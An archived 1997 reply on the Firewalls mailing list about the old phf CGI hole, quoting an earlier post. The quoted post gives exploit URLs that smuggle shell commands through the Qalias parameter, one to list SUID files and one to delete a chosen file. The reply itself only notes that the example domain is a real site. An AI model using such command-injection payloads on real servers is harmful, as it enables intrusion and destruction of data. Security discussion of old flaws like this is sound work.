Great Circle Associates Firewalls
(April 1997) 		 
Indexed By Date: [Previous] [Next] Indexed By Thread: [Previous] [Next]
Subject: Re: deleting files using phf...
From: Joao Brazao Ferreira <jbf @ tech . telepac . pt>
Organization: Telepac, SA
Date: Mon, 21 Apr 1997 17:39:55 +0100
To: Xxxxx Xxxxxxx <edub0y @ exis . net>
Cc: firewalls @ GreatCircle . COM
References: <1 . 5 . 4 . 16 . 19970417141913 . 66d71d5a @ mailhub . exis . net> 
Xxxxx Xxxxxxx wrote:

> After messing with the old 'phf' binary, I have found a way to
> pretty much
> crash or ruin a system remotely.  I know this sounds impossible,
> here is how
> you do it.
>
> http://www.xxx.com/cgi-bin/phf?Qalias=x%0a/bin/find%20/%20-type%20f%20-a%20-
>
> perm%20-4000%20-print
>
> which finds all SUID (Set User ID's) for that system)
>
> http://www.xxx.com/cgi-bin/phf?Qalias=x%0a/bin/rm%20( and the SUID
> file of
> the hackers choice )

Off-topic, but...
Just to say that www.xxx.com really exists, don't take it as a practical
example... (And what a site! :-))))

Regards,

Joao Ferreira
Follow-Ups:
References:
Indexed By Date Previous: RE: remote control thru a firewall
From: Dennis Roberts <droberts @ excell . com>
Next: RE: MS Proxy server capabilities
From: Leonard Miyata <leonard @ geminisecure . com>
Indexed By Thread Previous: deleting files using phf...
From: Xxxxx Xxxxxxx <edub0y @ exis . net>
Next: Re: deleting files using phf...
From: Rabid Wombat <wombat @ mcfeely . bsfs . org>
Google
 
Search Internet Search www.greatcircle.com